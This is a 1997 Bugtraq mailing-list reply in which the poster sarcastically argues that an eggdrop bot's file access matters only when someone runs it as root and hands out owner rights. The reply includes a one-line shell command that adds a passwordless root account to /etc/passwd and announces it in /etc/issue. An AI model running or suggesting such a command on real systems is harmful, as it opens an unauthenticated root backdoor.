Bugtraq mailing list archives
Re: Having fun with eggdrop bot
From: nolander () NOLANDER PP SE (The Nolander)
Date: Fri, 29 Aug 1997 19:43:15 +0200
Eggdrops bots can access files all over the system if you're owner and the bot runs with root permissions.
1) who runs a bot as root? 2) who gives away owner-access? Come on!.... echo "forgot::0:0::/:/bin/sh" >> /etc/passwd; echo "If you forgot your password, then login as 'forgot' with no password, and do "passwd <yourlogin>" >> /etc/issue What a huge security hole!
Current thread:
- Re: syslogd fun (erratum) Yuri Volobuev (Aug 28)
- Having fun with eggdrop bot Giuliano COCAINE (Aug 28)
- Re: Having fun with eggdrop bot The Nolander (Aug 29)
- Re: Having fun with eggdrop bot -*- Chotaire -*- (Aug 29)
- DDB/securelevel Aleph One (Aug 30)
- Re: DDB/securelevel Andrew Brown (Aug 30)
- Mac TCP/IP Stack glitch. nomad () APOLLO TOMCO NET (Aug 31)
- Re: Having fun with eggdrop bot The Nolander (Aug 29)
- Having fun with eggdrop bot Giuliano COCAINE (Aug 28)
- Re: syslogd fun (erratum) Theo de Raadt (Aug 28)
- SGI security patches Martin J. Dellwo (Aug 29)
- Somewhat of a security hole in CVS Elliot Lee (Aug 29)
- Re: Somewhat of a security hole in CVS Theo de Raadt (Aug 29)
- Re: Somewhat of a security hole in CVS Marc Slemko (Aug 29)
- rpm 2.4.6 (with /tmp fixes) Erik Troan (Aug 29)